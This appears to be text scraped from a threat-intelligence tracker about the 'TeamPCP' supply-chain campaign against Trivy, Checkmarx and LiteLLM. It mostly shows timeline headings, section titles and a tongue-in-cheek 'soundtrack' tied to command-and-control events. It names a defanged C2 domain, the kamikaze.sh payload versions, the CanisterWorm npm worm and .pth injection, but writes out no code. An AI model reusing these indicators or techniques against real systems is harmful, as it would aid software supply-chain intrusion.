ICP Fallback 03/22 15:20 UTC

Except Crime

YTCracker

ICP Fallback 03/22 15:57 UTC

Instant Message

Yung Innanet

ICP Fallback 03/22 19:27 UTC

Teardrop

Massive Attack

ICP Fallback 03/22 19:56 UTC

Drinking

bôa

ICP Fallback 03/22 20:12 UTC

The Show Must Go On

Queen

checkmarx[.]zone/vsx 03/23 12:53 UTC

Bad Apple!!

Touhou (English Remaster)

checkmarx[.]zone 03/24 13:39 UTC

1 / 9

TeamPCP Supply Chain Campaign

February 27, 2026

Observed impact (per Aqua):

Remediation:

What they missed:

Initial Compromise

Imposter Commit to actions/checkout

Imposter Commit to aquasecurity/trivy

Malicious v0.69.4 Tag Pushed

Malicious Releases Distributed

Lateral Movement via compromised aqua-bot identity

tfsec Workflow Compromised

traceeshark Workflow Compromised

trivy-action Workflow Compromised

Malicious Distribution

Malicious Action Tags Published

Obfuscation coordinated spam flood

Discussion #10420 Flooded

npm Worm CanisterWorm propagation

CanisterWorm Deployed to npm

ICP Fallback Activated kamikaze.sh deployed

kamikaze.sh v1 Payload Active on ICP C2

kamikaze.sh v2: Modular Architecture

kamikaze.sh v3: Now a Worm

kamikaze.sh v3.1: Two-Module Architecture

kamikaze.sh v3.2: Production-Ready Deployment

kamikaze.sh v3.3: WAV Steganography

Docker Hub Direct Push bypassing GitHub releases

aquasec/trivy:0.69.5 pushed to Docker Hub

aquasec/trivy:0.69.6 pushed to Docker Hub

Internal Aqua Repos Publicized via aquasec-com Org

Checkmarx Ecosystem same TTPs, new targets

Malicious extensions published to OpenVSX

35 KICS versions redirected to malicious commits

Checkmarx/ast-github-action v2.3.28 compromised

LiteLLM PyPI infostealer via .pth injection

Malicious litellm 1.82.7 & 1.82.8 published to PyPI

Spam flood targets security disclosure

BerriAI GitHub repos defaced

How did they gain access to push the malicious v0.69.4 tag?

Was aqua-bot the initial access vector, or only compromised via /trivy?

What was the v0.70.0 trivy attacker tag?

What was the setup-trivy poisoning?

Is DarkSeek3r related?

C2 Domains & IPs

Imposter & Injected Commits

GitHub Accounts

Poisoned Releases & Images

Strings & Filenames

TeamPCP

Cloud-Native Infrastructure

Common Techniques

Flare.io Analysis

Beelzebub Analysis

Trivy Supply Chain Attack: What Happened and What You Need to Know

TeamPCP Deploys CanisterWorm via npm

20 Days Later: Trivy Compromise Act II

Trivy Under Attack Again: GitHub Actions Compromise

Trivy Compromised a Second Time - Malicious v0.69.4 Release

MegaGame10418: The User Behind Hackerbot-Claw

aquasecurity/trivy

TeamPCP aquasec-com GitHub Org Compromise

Trivy GitHub Actions Compromise

TeamPCP Cloud-Native Ransomware

TeamPCP Expands Supply Chain Compromise: Spreads from Trivy to Checkmarx

Trivy Compromise Analysis

The Official Soundtrack of the Trivy Supply Chain Attack